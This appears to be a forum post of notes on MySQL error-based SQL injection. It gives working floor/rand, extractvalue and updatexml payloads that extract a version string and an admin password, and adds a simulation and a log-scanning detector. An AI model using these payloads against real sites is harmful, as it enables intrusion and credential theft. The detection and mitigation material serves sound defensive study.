Posting a few of my old notes. When MySQL executes a statement it raises error messages, and PHP+MySQL sites often print that error text directly on the page, so specific data can be retrieved by constructing queries in the following three ways.
Actual test environment:
" s+ P9 m9 s& E; F: t% _
+ t& S. W, U9 R; H- N
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error.
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is leaked in the error text. To retrieve other data, replace the expression in the version() position.
For example, to retrieve the administrator username and password:
Method1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
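Why the floor(rand(0)*2) queries above end in ERROR 1062 rather than a normal result is worth seeing once, because it is server-side behaviour the application cannot switch off; what the application controls is whether that error text reaches the browser. The model below is an added illustration, not code from these notes, and does not talk to MySQL: it replays the GROUP BY temporary-table logic in Python with a hard-coded key stream (the 0,1,1,0,1,1,... start of floor(rand(0)*2) is an assumption taken from common documentation of the function).

```python
"""Model of why the floor(rand(0)*2) GROUP BY query ends in ERROR 1062.

Added illustration, not code from the notes. MySQL resolves GROUP BY through
a temporary table keyed on the grouping expression. For every source row the
key is evaluated once to probe that table; when the key is absent, the
expression is evaluated a second time to build the row that gets inserted.
If the expression contains rand(0), the two evaluations differ, and the
second one can collide with a key stored earlier: the "Duplicate entry"
error then carries whatever was concat()'d in front of the digit.
"""
from typing import Dict, Iterator, Optional

# ASSUMPTION: 0,1,1,0,1,1,... is the commonly documented start of the
# floor(rand(0)*2) stream. It is hard-coded so the model runs without MySQL.
FLOOR_RAND0_SEQUENCE = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1]


def simulate_group_by(row_count: int, keys: Iterator[int],
                      leaked: str = "5.1.33-community-log") -> Optional[str]:
    """Return the key MySQL would reject as a duplicate, or None if the
    GROUP BY completes. `leaked` stands in for the concat()'d value
    (version(), a password column, ...) and `row_count` for the number of
    rows the outer FROM supplies (information_schema.tables has plenty)."""
    groups: Dict[str, int] = {}
    for _ in range(row_count):
        probe = f"{leaked}{next(keys)}"      # first evaluation: look up the group
        if probe in groups:
            groups[probe] += 1
            continue
        fresh = f"{leaked}{next(keys)}"      # second evaluation: build the new row
        if fresh in groups:
            return fresh                     # -> ERROR 1062 Duplicate entry '...1'
        groups[fresh] = 1
    return None


def demo() -> Dict[str, Optional[str]]:
    """Three source rows are enough for the collision; with only two rows
    the query completes, which is why a multi-row table is used as the source."""
    return {
        "three_rows": simulate_group_by(3, iter(FLOOR_RAND0_SEQUENCE)),
        "two_rows": simulate_group_by(2, iter(FLOOR_RAND0_SEQUENCE)),
    }


if __name__ == "__main__":
    print(demo())
```

Running it prints the same `5.1.33-community-log1` key that the real session reported. The defensive takeaway is that the duplicate-key message is only useful to an attacker because the application echoed it: parameterising `id` stops the subquery from ever reaching the server, and not passing database errors to the client (no `die(mysql_error())`, `display_errors` off) removes the channel even if some other query is still concatenated.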
2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:
0 U" c8 I* L6 T5 kand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))/ v& u; {9 r! u
实际测试过程7 S) ~0 O8 l9 x
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
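All three techniques leave two distinct traces: the payload in the request (floor(rand(, extractvalue(, updatexml( have no business in an integer id parameter) and, if the application passed the database error through as the opening paragraph describes, the ERROR 1062 / ERROR 1105 text in the application or web-server log. The scanner below is an added example, not code from these notes; it assumes common-log-format access lines and the sample lines in it are constructed for the example.

```python
"""Detection of the three error-based techniques described in the notes.

Added example, not code from the notes. Two passes: the request log, where
the payload is visible in the query string, and the application log, where
the MySQL error text appears if the application echoed it. All log lines
below are constructed; the access-log layout is assumed to be the common
log format used by Apache and nginx.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Function calls that only appear in an error-based probe of the id parameter.
TECHNIQUES: Dict[str, "re.Pattern[str]"] = {
    "floor_groupby": re.compile(r"floor\s*\(\s*rand\s*\("),
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "updatexml": re.compile(r"updatexml\s*\("),
}

# Server errors showing that the probe executed and its output was echoed.
DB_ERRORS: Dict[str, "re.Pattern[str]"] = {
    "dup_entry_1062": re.compile(r"ERROR 1062|Duplicate entry '[^']*' for key 'group_key'"),
    "xpath_1105": re.compile(r"ERROR 1105|XPATH syntax error"),
}

ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decode(value: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of URL encoding (double encoding is a
    common evasion) and lower-case so the patterns match regardless of case."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request whose target carries a known probe."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        target = decode(m.group("target"))
        hits = [name for name, pat in TECHNIQUES.items() if pat.search(target)]
        if hits:
            findings.append({"ip": m.group("ip"), "target": m.group("target"),
                             "techniques": hits})
    return findings


def scan_app_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, error class) for echoed MySQL error text."""
    return [(idx, name) for idx, line in enumerate(lines)
            for name, pat in DB_ERRORS.items() if pat.search(line)]


# Constructed sample data: one benign request, then the three probes from the
# notes (the last one double-URL-encoded).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1%20and%20extractvalue(1,'
    'concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 200 380',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1%20and%20(select%201%20from'
    '(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 390',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1%2520and%25201%3D(updatexml'
    '(1%2Cconcat(0x5e24%2C(select%2520user())%2C0x5e24)%2C1)) HTTP/1.1" 200 370',
]
SAMPLE_APP_LOG = [
    "[01/Jan/2024:10:00:00] article.php: query ok, 1 row",
    "[01/Jan/2024:10:00:01] article.php: XPATH syntax error: '\\admin888'",
    "[01/Jan/2024:10:00:02] article.php: Duplicate entry '5.1.33-community-log1' for key 'group_key'",
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f["ip"], f["techniques"], f["target"][:60])
    print(scan_app_log(SAMPLE_APP_LOG))
```

Matching on the request alone tells you someone probed; a matching application-log error in the same second tells you the probe ran and the error was echoed, which is the condition that makes these techniques work and the thing to fix first.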
That's all; thanks to the foreign guys.